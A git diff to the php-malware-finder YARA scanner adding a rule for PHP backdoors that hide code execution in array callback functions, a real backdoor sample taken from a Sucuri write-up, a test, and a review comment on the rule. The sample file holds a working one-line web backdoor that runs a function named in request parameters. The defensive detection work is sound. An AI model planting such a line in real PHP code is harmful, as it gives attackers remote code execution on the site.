-rw-r--r--php-malware-finder/php.yar3
-rw-r--r--php-malware-finder/samples/real/sucuri_2014_04.php3
-rwxr-xr-xphp-malware-finder/tests.sh3
3 files changed, 8 insertions, 1 deletions
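diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
index ab63da5..1659754 100644
--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -76,8 +76,9 @@ rule DodgyPhp
 $basedir_bypass = /curl_init\s*\(\s*["']file:\/\//
 $basedir_bypass2 = "file:file:///" // https://www.intelligentexploit.com/view-details.html?id=8719
 $disable_magic_quotes = /set_magic_quotes_runtime\s*\(\s*0/
-$execution = /(eval|assert|passthru|exec|include|system|pcntl_exec|shell_execute|base64_decode|`|array_map|call_user_func(_array)?)\s*\(\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE))/ nocase
+$execution = /(eval|assert|passthru|exec|include|system|pcntl_exec|shell_execute|base64_decode|`|array_map|call_user_func(_array)?)\s*\(\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE))/ nocase // function that takes a callback as 1st parameter
 $execution2 = /(array_filter|array_reduce|array_walk(_recursive)?|array_walk|assert_options|uasort|uksort|usort|preg_replace_callback|iterator_apply)\s*\(\s*[^,]+,\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE))/ nocase // functions that takes a callback as 2nd parameter
+$execution3 = /(array_(diff|intersect)_u(key|assoc)|array_udiff)\s*\(\s*([^,]+\s*,?)+\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE))\s*\[[^]]+\]\s*\)+\s*;/ nocase // functions that takes a callback as 2nd parameter
 
 $htaccess = "SetHandler application/x-httpd-php"
 $iis_com = /IIS:\/\/localhost\/w3svc/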
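Review bot: The trailing comment on the new `$execution3` string is copied from `$execution2` and is wrong for this family of functions, which take the user callback as their last argument rather than the 2nd; suggest `// functions that take a callback as last parameter`. The function alternation also leaves out the sibling user-callback variants array_uintersect, array_udiff_assoc, array_uintersect_assoc, array_udiff_uassoc and array_uintersect_uassoc, all of which take a callback last and would be covered by `(array_u(diff|intersect)(_u?assoc)?|array_(diff|intersect)_u(key|assoc))` in place of `(array_(diff|intersect)_u(key|assoc)|array_udiff)`. Note that the pattern only fires when the callback is an indexed superglobal immediately followed by the closing parentheses and `;`, so a callback first stored in a local variable is not caught; that is presumably a deliberate precision trade-off but worth stating in the comment. The `rule DodgyPhp` body starts and ends outside the hunk.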
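diff --git a/php-malware-finder/samples/real/sucuri_2014_04.php b/php-malware-finder/samples/real/sucuri_2014_04.php
new file mode 100644
index 0000000..64bfa07
--- /dev/null
+++ b/php-malware-finder/samples/real/sucuri_2014_04.php
@@ -0,0 +1,3 @@
+<?php
+/* https://blog.sucuri.net/2014/04/php-callback-functions-another-way-to-hide-backdoors.html */
+@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);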
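diff --git a/php-malware-finder/tests.sh b/php-malware-finder/tests.sh
index 42c2456..6928e65 100755
--- a/php-malware-finder/tests.sh
+++ b/php-malware-finder/tests.sh
@@ -88,6 +88,9 @@ run_test artificial/bypasses.php 'DodgyPhp'
 run_test artificial/bypasses.php '0x6d:$execution: call_user_func_array($_POST'
 run_test artificial/bypasses.php "0x132:\$var_as_func: \$_POST\['funct'\]("
 
+# real
+run_test real/sucuri_2014_04.php '0x67:$execution3:'
+
 # Asp files
 run_test_asp classic/cmdasp.asp 'DodgyStrings'
 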